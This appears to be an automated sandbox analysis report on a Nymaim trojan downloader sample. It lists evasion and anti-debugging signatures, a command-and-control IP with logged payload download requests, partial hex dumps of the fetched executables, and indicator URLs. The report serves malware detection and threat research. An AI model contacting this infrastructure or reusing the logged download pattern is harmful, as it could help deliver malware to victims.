Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565422
MD5: f7de1701682b8875c140e8d55b51b2d6
SHA1: 42afc2d0566630d75efbada19b24fa42464c72c2
SHA256: 60deca977327bb594df9bcbbb81215761b4f84ce48c0e3243531e86e9831dca0
Tags: exeuser-Bitsight
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Nymaim Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

AV Detection
barindex
Found malware configuration
Source: 0.2.file.exe.4a20e67.1.raw.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe ReversingLabs: Detection: 75%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 0_2_004035D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A23837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 0_2_04A23837
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417727 FindFirstFileExW, 0_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007EA9 FindFirstFileExW, 0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A3798E FindFirstFileExW, 0_2_04A3798E

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Nov 2024 18:50:34 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Nov 2024 18:50:36 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.156.72.65 185.156.72.65
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 0_2_00401970
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1947623162.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/downloadG
Source: file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/downloadQ
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/key
Source: file.exe, 00000000.00000003.1585127269.0000000005337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/download
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/download65/files/download-e433ee860fe502924bLMEM
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/downloadN
Source: file.exe, 00000000.00000002.1949998784.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/soft/download
Source: Amcache.hve.13.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: https://iplogger.org/1Pz8p7

E-Banking Fraud
barindex
Yara detected Nymaim
Source: Yara match File source: 0.2.file.exe.4a20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.4a50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1259267690.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Detected potential crypto function
